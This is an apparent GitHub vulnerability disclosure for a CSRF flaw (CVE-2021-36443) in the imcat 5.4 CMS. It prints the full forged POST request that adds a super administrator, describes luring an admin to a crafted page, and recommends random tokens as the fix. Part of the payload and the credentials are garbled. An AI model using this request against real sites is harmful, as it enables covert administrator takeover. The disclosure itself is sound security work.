Headline
CVE-2021-36443: CSRF vulnerability in imcat v5.4 · Issue #9 · peacexie/imcat
Cross Site Request Forgery vulnerability in imcat 5.4 allows remote attackers to escalate privilege via lack of token verification.
1. Overview
Official website: http://txjia.com/imcat/
Version: imcat-5.4
Vulnerability type: CSRF post
Source code: https://github.com/peacexie/imcat/releases/tag/v5.4
Harm: Super administrator account can be added
2. Analysis
2.1 logic analysis
In the add administrator page, the security of data source is not verified by token and referer
(1) There is no token used for security verification in the data packet, so there is the possibility of forgery
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9
Upgrade-Insecure-Requests: 1
recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe_123&fm%5Bupass%5D=adm_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm_123&fm%5Beuser%5D=adm_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1
(2) After deleting the referer: information, you can still add an administrator
3. Loophole recurrence
(1) Environment preparation, building environment with phpstudy
(2) Construct a payload with the function of creating a super administrator account, qwe_ 123/adm_ one hundred and twenty-three
<script>history.pushState('’, '’, ‘/’)</script> (3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator’s knowledge    ### 4. Verification of attack results
Using qwe_ 123/adm_ 123 login in the background
5. Means of Defense
Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable